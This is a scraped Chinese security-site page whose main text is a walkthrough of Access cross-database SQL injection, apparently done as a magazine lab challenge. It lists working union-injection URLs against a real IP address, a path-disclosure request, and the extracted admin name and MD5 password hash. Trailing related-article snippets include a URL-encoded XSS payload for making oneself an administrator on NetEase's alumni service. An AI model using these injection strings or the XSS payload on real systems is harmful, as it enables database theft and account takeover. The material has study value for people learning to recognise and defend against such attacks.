Access的跨库查询 (图)_漏洞研究

大家还记得mssql的跨库查询吧,其实在access中也可以实现2个数据之间的交叉查询。下面我就给大家介绍下access的跨库查询。
  首先让我们看看在access里是怎样实现对mdb文件进行查询的,我们随便创建个空数据库,对数据库D:\daos\db\daidalos.mdb里的admin表的内容进行查询,SQL语句为:
javascript:if(this.width>500)this.width=500" border=0>
  查询后,成功返回目标数据库里表admin表里的内容:
javascript:if(this.width>500)this.width=500" border=0>
  在实际的asp注射中,要同时进行2个select,如果大家熟悉php+mysql注射的话,应该很容易想到使用union进行联合查询,在access里我们照样可以使用,使用union查询还有一个好处就是不要去对数据进行一个一个字符的去猜,而可以象mysql+php注射一样直接暴出字段里的数据(具体的mix已经写了一篇详细的文章)。从上面可以看出来要实现跨库查询必修要下面2个条件:
使用union查询必须知道前一个select里表的字段数
必须知道目标数据库的所在位置,绝对路径。
  条件1我们可以根据提示错误信息来手工猜解,也可以通过程序自动实现。
  条件2 这个是个难点,不过我们可以通过利用“access暴库”来实现,有人会说既然可以知道数据位置,那不直接下载得拉,其实不然,现在的数据库一般防止下载,有的根本不web目录下。
  在黑防第四轮实验室的第一关,就是设置的2个asp+access的下载系统,一个是雨点下载系统,一个是盗帅下载系统。 经过测试 盗帅下载系统可以暴出数据库但是不让下载,似乎也没什么地方可以注射,而雨点下载系统就是漏洞百出了,数据库可以暴且可以直接下载,还可以注射。不过雨点的后台很简单,没什么可以利用的地方,我们的目标就放在得到盗帅后台密码上了,下面我就给大家演示下,通过雨点系统的注射点对盗帅系统的跨库查询而得到盗帅的后台密码:
我们得知雨点系统的list.asp可以注射,我们先去要得到union里的数据表字段数,提交:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201%20from%20userinfo

  返回:
Microsoft JET Database Engine 错误 '80040e14'
在联合查询中所选定的两个数据表或查询中的列数不匹配。
/yddown/list.asp,行51

  字段不对,我写了个perl脚本自动猜,(代码见后)
  当我们提交:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201,2,3%20from%20userinfo

  无错误返回:
javascript:if(this.width>500)this.width=500" border=0>
 哈哈! 我们已经得到字段数了,并且我们可以得到在字段1的我位置,可以显示我们查询的数据。
   现在还就差盗帅的数据库位置了,简单我们暴库,提交:
http://219.237.81.46/dsdown%5cregs.asp

  成功返回路径:
Microsoft JET Database Engine 错误 '80004005'
'D:\111\db\kljdsld.asa'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。
/dsdown/db/user.asp,行6

  (注意:这样得到的的路径不一定是“完整”的,真正的路径为:D:\111\dsdown\db\kljdsld.asa)
  下面我们跨库,构造url如下:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20admin,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1

  
上面的语句是,union查询数据D:\111\db\kljdsld.asa里表admin里id=1的字段admin的数据,如果成功将直接暴出后台管理的用户名:
计算机漏洞分类研究">javascript:if(this.width>500)this.width=500" border=0>
  得到用户名为admin 我们接着暴密码:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20pws,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1

  如图:
javascript:if(this.width>500)this.width=500" border=0>
  得到密码为32位的md5加密的hash:77e6cbb3f9468eadb655ae6826357922,我们跨库查询成功,这里我只是为大家演示下跨库查询,黑防那里就不管咯 : )。
小结
  本文主要是给大家介绍了2个非常有用的方法,第1 我们在asp注射时不一顶要一个个字符去猜,那样遇到中文的很麻烦,直接用union替代数据可以直接暴出数据,不关是中文还是特殊字符,都可以一步到位,第2 就是跨库了,使用很灵活,可以让你在渗透时,有意想不到的收获。

时间: 2024-08-24 05:28:44

Access的跨库查询 (图)_漏洞研究的相关文章

php结合ACCESS的跨库查询功能

 问题说明: 有时需要在两个或三个数据库的表中,通过相关关键字,查询获取所需记录集,用一般的SQL查询语句是实现不了的,可通过ACCESS的跨库查询功能实现. 解决方法: 例如"装材类型"和"装材"两张表是在不同的数据库中的,具体查询方法,如下:   代码如下: @"Select * from 装材类型 as a INNER JOIN [;database=" AppDomain.CurrentDomain.BaseDirectory "

php结合ACCESS的跨库查询功能_php技巧

问题说明: 有时需要在两个或三个数据库的表中,通过相关关键字,查询获取所需记录集,用一般的SQL查询语句是实现不了的,可通过ACCESS的跨库查询功能实现. 解决方法: 例如"装材类型"和"装材"两张表是在不同的数据库中的,具体查询方法,如下: 复制代码 代码如下: @"Select * from 装材类型 as a INNER JOIN [;database=" AppDomain.CurrentDomain.BaseDirectory &qu

当备份数据库不能用时.用邮件列表得到WEBSHELL!(图)_漏洞研究

今天上午闲着无聊,刚好一个朋友发过来一个网站的后台管理密码.他要我帮他看看.我说你得到后台了.可以用备份数据库功能得到WEBSHELL啊.你还发过来干嘛.他说后台有数据备份的选项.但是不能用.大家看一下图!  列表得到WEBSHELL!(图)_漏洞研究-数据库备份拿shell">  里面有备份的选项.但是点了之后出现错误!应该是管理员把文件改名了.或者是位置改变了.不能备份数据库,那怎么办,不能白白的浪费这样的一个机会.我就在后台里面到处看了一下.发现可以通过改网站注册用户的邮件地址.我们

动网access版暴log库终极大法_漏洞研究

注:需要获得前台管理员权限后使用  文章中指定recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_id=5%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1&page=2000(回收站的最后页的id),指变换l_id=''的值来暴出l_concent的值一次只能暴一个内容,看了下动网的数据库表,只要指定l_an

注入过程中遇到DB_OWNER的想法(图)_漏洞研究

首先先声明这个文章是写给菜鸟朋友看的     .现在注入横飞!工具一大堆,过去手工注入的时代已经不复存在!代之的是NBSI HDSI 啊D注入工具..等等.也是广大菜鸟的最爱了.即使什么也不会.什么也不懂.只需要点几下鼠标.存在注入漏洞的网站密码就出来了.接下来就是扫扫后台.传传马.就完了.就这样简单.碰到SA权限的话就.直接建立号开3389或者上传WEBSHELL.是内网就映射.是DB_OWNER权限的话呢就考虑用备份差异.但是WEB和数据库不在同一台服务器该怎么搞呢?其实也不一定是搞不定.除

PHP博客程序C-blog2.0漏洞测试大揭密(图)_漏洞研究

c-blog2.1测试手记 朋友买了空间支持php但是没有mysql数据库,说是这空间商主要是支持asp脚本的.哎 难道就不能玩php了吗?  嘿嘿 可以用php+access的php程序啊.百度了下发现了c-blog这个程序,它有个php+access版本的.down下了看看,就有了这次测试的结果. 1.暴出物理路径 在看了这个blog后,发现他写的到上没什么太大的bug,文件比较少而且简结. 它的说明上看到了如下: ./include   包含常用类库 编辑器 配置文件 -->/config

图片引发的溢出危机(图)_漏洞研究

就在刚迈入2006年之际,Windows系统出现了一个严重的漏洞,这就是Microsoft Windows图形渲染引擎wmf格式代码漏洞(ms0601).这个漏洞出现在Windows的图形渲染引擎中,黑客可以构造恶意的wmf文件,引诱其他用户打开,当系统没有更新过wmf补丁时,将会执行黑客事先设置好的恶意代码,获取系统的最高权限,从而完全听命于黑客.就在漏洞公布几天后,网络上使用wmf漏洞进行传播的病毒.攻击事件不断,直至今日,网上仍然充斥着无数利用wmf漏洞的攻击.本文将向大家介绍有关wmf漏

新兴木马NameLess BackDoor复仇记(图)_漏洞研究

NameLess BackDoor是一款新兴的DLL型木马,这个木马出世没多久,但绝对是一匹极有潜质的千里驹.说起NameLess BackDoor的前身来,不得不提及榕哥的BITS和WinEggDrop的PortLess.这两款大名鼎鼎的木马曾经都风光一时,可以说是木马界的元老了.而NameLess BackDoor则是汇集了上面这两款木马的优点,在目标机器的进程管理器中看不到,平时没有端口,提供正向连接和反向连接两种功能.同时NameLess BackDoor又去除了各处的缺点,比如反弹的c

也谈一个跨站的利用_漏洞研究

1.方法: 网易同学录留言功能存在跨站,这里演示一个利用它把自己加为班级管理员的方法. 在留言框里填写: +++try%20%7B%0D%0A%09var%20as%20%3D%20document.getElementsByTagName%28%22a%22%29%3B%0D%0A%09var%20frm%20%3D%20document.getElementsByTagName%28%22iframe%22%29%5B0%5D%3B%0D%0A%09frm.onload%20%3D%20fu